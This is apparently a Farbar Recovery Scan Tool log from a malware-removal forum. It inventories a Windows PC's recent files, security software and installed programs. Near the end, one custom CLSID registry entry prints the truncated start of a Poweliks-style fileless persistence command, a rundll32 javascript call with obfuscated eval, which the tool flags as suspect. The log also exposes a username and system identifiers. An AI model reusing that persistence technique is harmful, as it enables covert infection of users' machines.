2014-12-09 13:00 - 2014-11-21 18:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-12-09 13:00 - 2014-11-21 18:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-12-09 13:00 - 2014-11-21 18:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-12-09 13:00 - 2014-11-21 18:34 - 06039552 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-12-09 13:00 - 2014-11-21 18:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-12-09 13:00 - 2014-11-21 18:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-12-09 13:00 - 2014-11-21 18:22 - 19749376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-12-09 13:00 - 2014-11-21 18:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-12-09 13:00 - 2014-11-21 18:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-12-09 13:00 - 2014-11-21 18:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-12-09 13:00 - 2014-11-21 18:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-12-09 13:00 - 2014-11-21 18:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-12-09 13:00 - 2014-11-21 18:07 - 00501248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-12-09 13:00 - 2014-11-21 18:07 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-12-09 13:00 - 2014-11-21 18:06 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-12-09 13:00 - 2014-11-21 18:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-12-09 13:00 - 2014-11-21 18:05 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-12-09 13:00 - 2014-11-21 18:01 - 02277888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-12-09 13:00 - 2014-11-21 17:59 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-12-09 13:00 - 2014-11-21 17:58 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-12-09 13:00 - 2014-11-21 17:56 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-12-09 13:00 - 2014-11-21 17:54 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-12-09 13:00 - 2014-11-21 17:49 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-12-09 13:00 - 2014-11-21 17:49 - 00718848 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-12-09 13:00 - 2014-11-21 17:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-12-09 13:00 - 2014-11-21 17:46 - 02125312 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-12-09 13:00 - 2014-11-21 17:45 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-12-09 13:00 - 2014-11-21 17:43 - 14412800 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-12-09 13:00 - 2014-11-21 17:40 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-12-09 13:00 - 2014-11-21 17:36 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-12-09 13:00 - 2014-11-21 17:35 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-12-09 13:00 - 2014-11-21 17:33 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-12-09 13:00 - 2014-11-21 17:29 - 04299264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-12-09 13:00 - 2014-11-21 17:28 - 02358272 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-12-09 13:00 - 2014-11-21 17:23 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-12-09 13:00 - 2014-11-21 17:22 - 02052096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-12-09 13:00 - 2014-11-21 17:21 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-12-09 13:00 - 2014-11-21 17:15 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-12-09 13:00 - 2014-11-21 17:13 - 12836864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-12-09 13:00 - 2014-11-21 17:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-12-09 13:00 - 2014-11-21 17:00 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-12-09 13:00 - 2014-11-21 16:56 - 01307136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-12-09 13:00 - 2014-11-21 16:54 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-12-09 13:00 - 2014-11-10 19:09 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-12-09 13:00 - 2014-11-10 18:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-12-09 13:00 - 2014-11-10 17:46 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2014-12-09 12:59 - 2014-11-07 19:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-09 12:59 - 2014-11-07 18:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-12-09 12:59 - 2014-10-29 18:03 - 00165888 _____ (Microsoft Corporation) C:\Windows\system32\charmap.exe
2014-12-09 12:59 - 2014-10-29 17:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2014-12-09 12:59 - 2014-10-02 18:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-12-09 12:59 - 2014-10-02 18:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2014-12-09 12:59 - 2014-10-02 18:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-12-09 12:59 - 2014-10-02 18:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2014-12-09 12:59 - 2014-10-02 18:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2014-12-09 12:59 - 2014-10-02 17:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-12-09 12:59 - 2014-10-02 17:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2014-12-09 12:59 - 2014-10-02 17:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-12-09 12:59 - 2014-10-02 17:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2014-12-09 12:59 - 2014-10-02 17:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2014-12-09 12:43 - 2015-01-06 14:15 - 00001006 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk
2014-12-09 12:43 - 2015-01-06 14:15 - 00000990 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2014-12-09 12:43 - 2014-12-09 12:48 - 00000000 ____D () C:\Program Files (x86)\LogMeIn
2014-12-09 12:43 - 2014-12-09 12:43 - 00000000 ____D () C:\Users\georgepc\AppData\Local\LogMeIn
2014-12-09 12:43 - 2014-10-31 11:55 - 00107392 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll
2014-12-09 12:43 - 2014-10-31 11:54 - 00092520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll
2014-12-09 12:43 - 2014-10-31 11:54 - 00035688 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll
2014-12-09 12:43 - 2014-10-31 11:15 - 00072216 _____ (LogMeIn, Inc.) C:\Windows\system32\Drivers\LMIRfsDriver.sys
2014-12-09 12:38 - 2014-12-09 12:38 - 26279936 _____ () C:\Users\georgepc\Downloads\LogMeIn.msi
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2015-01-07 13:43 - 2014-09-01 08:03 - 00000000 ____D () C:\Users\georgepc\Documents\Outlook Files
2015-01-07 12:52 - 2014-06-03 17:19 - 01967789 _____ () C:\Windows\WindowsUpdate.log
2015-01-07 12:50 - 2014-10-02 15:39 - 00000580 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3959093455-1914111138-4206043169-1001.job
2015-01-07 12:50 - 2014-07-23 21:27 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-01-07 12:12 - 2014-10-02 13:44 - 00000000 ____D () C:\Users\georgepc\AppData\Local\CrashDumps
2015-01-07 09:44 - 2014-07-19 13:04 - 00000000 ____D () C:\ProgramData\MFAData
2015-01-07 08:50 - 2014-07-23 21:27 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-06 16:56 - 2014-09-04 20:13 - 00005002 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for GeorgePan-PC-georgepc GeorgePan-PC
2015-01-06 14:23 - 2009-07-13 20:45 - 00031312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-06 14:23 - 2009-07-13 20:45 - 00031312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-06 14:17 - 2014-06-03 15:48 - 00006462 _____ () C:\Windows\SysWOW64\Gms.log
2015-01-06 14:17 - 2014-06-03 15:42 - 00000000 ____D () C:\Program Files (x86)\Dell Backup and Recovery
2015-01-06 14:15 - 2014-12-06 17:30 - 00000000 ____D () C:\ProgramData\LogMeIn
2015-01-06 14:15 - 2009-07-13 21:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-06 14:15 - 2009-07-13 20:51 - 00039188 _____ () C:\Windows\setupact.log
2015-01-06 13:00 - 2014-08-19 09:19 - 00000000 ____D () C:\Users\georgepc\AppData\Roaming\TeamViewer
2015-01-05 18:21 - 2014-07-23 21:31 - 00000000 ____D () C:\Ame 2.0
2015-01-05 18:14 - 2009-07-13 21:13 - 00783606 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-05 11:45 - 2014-07-19 12:05 - 00000000 ____D () C:\ProgramData\softthinks
2015-01-03 20:39 - 2009-07-13 20:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-01-02 20:59 - 2014-08-07 10:21 - 00000000 ____D () C:\PAS42
2014-12-31 21:48 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-12-31 16:13 - 2010-11-20 19:47 - 00277854 _____ () C:\Windows\PFRO.log
2014-12-31 08:59 - 2014-08-05 15:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Update AME 2.0
2014-12-30 16:05 - 2014-11-20 21:51 - 00000000 ____D () C:\Users\georgepc\AppData\Local\Avg2015
2014-12-30 13:12 - 2014-06-03 15:53 - 00000000 ____D () C:\ProgramData\Atheros
2014-12-30 09:50 - 2014-09-23 08:59 - 00000000 __SHD () C:\Users\georgepc\Documents\cache
2014-12-30 08:03 - 2014-09-23 08:58 - 00000000 ____D () C:\ProgramData\WebEx
2014-12-24 20:35 - 2014-11-20 21:53 - 00000000 ____D () C:\ProgramData\AVG2015
2014-12-23 03:56 - 2014-07-26 15:08 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2014-12-21 13:52 - 2014-10-02 15:39 - 00003620 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3959093455-1914111138-4206043169-1001
2014-12-16 09:27 - 2014-07-23 22:06 - 00001998 ____H () C:\Users\georgepc\Documents\Default.rdp
2014-12-16 08:52 - 2014-07-19 12:52 - 00000000 ____D () C:\Users\georgepc
2014-12-15 12:26 - 2014-07-26 23:13 - 00000000 ____D () C:\Users\georgepc\AppData\Local\Microsoft Help
2014-12-15 11:56 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\Registration
2014-12-13 03:00 - 2009-07-13 19:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared
2014-12-12 03:54 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\rescache
2014-12-11 16:57 - 2014-06-03 15:42 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-12-10 03:16 - 2014-07-21 02:30 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-12-10 03:16 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-10 03:16 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\AppCompat
2014-12-09 12:43 - 2014-12-06 17:30 - 00001024 _____ () C:\.rnd
2014-12-09 12:36 - 2014-07-19 13:08 - 00000000 ____D () C:\Windows\system32\appmgmt
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2015-01-04 00:23
==================== End Of Log ============================
- Addition.txt
-
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 07-01-2015
Ran by georgepc at 2015-01-07 13:43:55
Running from C:\Users\georgepc\Desktop\Geekstogo
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
2010 Lacerte Tax (HKLM-x32\...\2010 Lacerte Tax) (Version: - Intuit Inc.)
64 Bit HP CIO Components Installer (Version: 4.2.1 - Hewlett-Packard) Hidden
Accidental Damage Services Agreement (HKLM-x32\...\{EF85FEF4-EB92-4075-A6D2-5F519BB30A2C}) (Version: 2.0.0 - Dell Inc.)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader XI MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.00 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
AME 2.0 (HKLM-x32\...\AME 2.0) (Version: - AME Software Products, Inc.)
AME 2.0 (x32 Version: 2.0 - AME Software Products, Inc.) Hidden
AME Efiling 2014 version 2.5.1 (HKLM-x32\...\{BB38C01D-7F97-4D9E-8E6B-38FC2E1C9DF9}_is1) (Version: 2.5.1 - AME Software Products, Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.170 - Atheros)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5577 - AVG Technologies)
AVG 2015 (Version: 15.0.4257 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5577 - AVG Technologies) Hidden
Banctec Service Agreement (HKLM-x32\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{C57F6C71-C365-4AFF-9108-397BBAD6127F}) (Version: 1.0.204 - Citrix)
Complete Care Business Service Agreement (HKLM-x32\...\{0ECFCB07-9BFE-4970-ACA1-D568D982760B}) (Version: 2.0.0 - Dell Inc.)
Consumer In-Home Service Agreement (HKLM-x32\...\{F47C37A4-7189-430A-B81D-739FF8A7A554}) (Version: 2.0.0 - Dell Inc.)
Creative Solutions Accounting - Workstation (HKLM-x32\...\Creative Solutions Accounting Workstation) (Version: - )
Dell Backup and Recovery - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 1.7.1.2 - Dell Inc.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.7.1.2 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{D850CB7E-72BC-4510-BA4F-48932BFAB295}) (Version: 2.9.901.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Home Systems Service Agreement (HKLM-x32\...\{AB2FDE4F-6BED-4E9E-B676-3DCCEBB1FBFE}) (Version: 2.0.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 9.0 - Dell Inc.)
eFileCabinet 2014 Client (HKLM-x32\...\{4E422FDA-BA7A-4EB4-9B9D-C6E66815B93F}) (Version: 5.0.0 - eFileCabinet, inc)
eFileScanner 5 (HKLM-x32\...\{EFE78675-4C12-43C8-961C-439F5C55A3D4}) (Version: 5.0.0 - eFileCabinet, Inc)
FileCabinet CS (HKLM-x32\...\FileCabinet CS) (Version: 13.1.0 - Thomson Reuters)
FileCabinet CS Print Driver (HKLM-x32\...\FileCabinet CS Print Driver) (Version: 13.1.0 - Thomson Reuters)
Fixed Assets CS (HKLM-x32\...\Fixed Assets CS) (Version: 13.1.0 - Thomson Reuters)
Foxit PhantomPDF Business (HKLM-x32\...\{E9AA5BDC-7DFA-4CB8-96B5-F545F20EBFDB}) (Version: 7.0.3.916 - Foxit Software Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
GoToAssist Customer 2.2.0.758 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.2.0.758 - Citrix Online)
GoToMeeting 7.0.5.2130 (HKU\S-1-5-21-3959093455-1914111138-4206043169-1001\...\GoToMeeting) (Version: 7.0.5.2130 - CitrixOnline)
Infragisticsv112Install 2013 (HKLM-x32\...\{E20658ED-E86A-4681-9649-2AB8151B4ADF}) (Version: 13.1.0 - Thomson Reuters)
Infragisticsv62Install 2010 (HKLM-x32\...\{705292ED-22B2-4BCF-8DD4-F9B393844D7D}) (Version: 10.1.0 - Thomson Reuters)
Intel® Chipset Device Software (x32 Version: 10.0.13 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1168 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.0.2.1001 - Intel Corporation)
Intel® Update Manager (HKLM-x32\...\{AD6B46F2-FE21-496F-BE90-BE19AABE353C}) (Version: 2.2.12 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Intuit Runtime Components 6.0.16 (HKLM-x32\...\{6A3CAA8E-6DDB-4AA7-A411-9982FF9180FE}) (Version: 6.0.16 - Intuit Inc.)
LogMeIn (HKLM-x32\...\{F93EE340-3735-4032-8B74-0A3E489017A0}) (Version: 4.1.4670 - LogMeIn, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4675.1003 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3959093455-1914111138-4206043169-1001\...\OneDriveSetup.exe) (Version: 17.3.1171.0714 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4675.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4675.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4675.1003 - Microsoft Corporation) Hidden
Padgett 4.2 Client (HKLM-x32\...\{C3130FA3-57C6-47E3-ADEA-1656CC072C1E}) (Version: 4.2 - Padgett Business Services)
PAS42Client (x32 Version: 1.00.000 - Sybase) Hidden
Premium Service Agreement (HKLM-x32\...\{C33AA6D6-F5EC-48F3-AFDC-8141345D473A}) (Version: 2.0.0 - Dell Inc.)
QualxServ Service Agreement (HKLM-x32\...\{903679E8-44C8-4C07-9600-05C92654FC50}) (Version: 2.0.0 - Dell Inc.)
Quickfinder Tax & Financial Tools (HKLM-x32\...\{2C6BA65D-90D8-4F86-9525-62DABB693C9D}) (Version: 123.131.03585 - Thomson Reuters)
Quickfinder Tax & Financial Tools Shared Files (HKLM-x32\...\{DEAF53FA-06E1-4B1D-875E-F729EC303C35}) (Version: 123.131.03585 - Thomson Reuters)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.30164 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6909 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Small Business Tools 2007 (HKLM-x32\...\Small Business Tools 2007) (Version: - )
TaxTools 2011 (HKLM-x32\...\{A2E08D37-BEA0-43D7-94A1-D88246D39F94}) (Version: 11.111.147 - CFS Tax Software, Inc.)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)
UltraTax Font Installer (HKLM-x32\...\{7177CDFD-3274-4F8C-977F-7C82C73CA34C}) (Version: 12.00.0000 - Thomson Reuters)
UltraTax Font Installer (HKLM-x32\...\{7699AA03-8A8C-489E-AF9D-A76A5E97E879}) (Version: 1.00.0000 - Thomson Tax & Accounting)
Update AME 2.0 version 2.3.1 (HKLM-x32\...\{1A2CBA77-0146-4CC5-A9C5-93C8DDB9D303}_is1) (Version: 2.3.1 - AME Software Products, Inc.)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinZip 19.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E5}) (Version: 19.0.11293 - WinZip Computing, S.L. )
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Citrix\GoToMeeting\2031\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\SkyDriveShell64.dll (Microsoft Corporation)
